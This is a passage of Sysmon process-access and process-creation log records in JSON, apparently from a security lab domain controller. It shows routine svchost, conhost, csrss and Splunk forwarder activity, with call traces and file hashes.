dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2194,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.349\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.349","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2195,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.349\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.349","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2196,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.349\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.349","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2197,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.349\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.349","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2198,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.349\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1070-5F25-0000-001058060400}\r\nTargetProcessId: 4064\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.349","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1070-5F25-0000-001058060400}","TargetProcessId":"4064","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2199,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.460\r\nProcessGuid: {E2A3D6B1-1070-5F25-0000-00105B080400}\r\nProcessId: 2800\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\admon.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nParentProcessId: 2792\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.460","ProcessGuid":"{E2A3D6B1-1070-5F25-0000-00105B080400}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\admon.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","ParentProcessId":"2792","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2200,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.458\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nSourceProcessId: 2792\r\nSourceThreadId: 3812\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-106F-5F25-0000-0010DFEC0300}\r\nTargetProcessId: 2800\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.458","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","SourceProcessId":"2792","SourceThreadId":"3812","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-106F-5F25-0000-0010DFEC0300}","TargetProcessId":"2800","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2201,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.458\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-106F-5F25-0000-0010DFEC0300}\r\nTargetProcessId: 2800\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.458","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-106F-5F25-0000-0010DFEC0300}","TargetProcessId":"2800","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2202,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.458\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 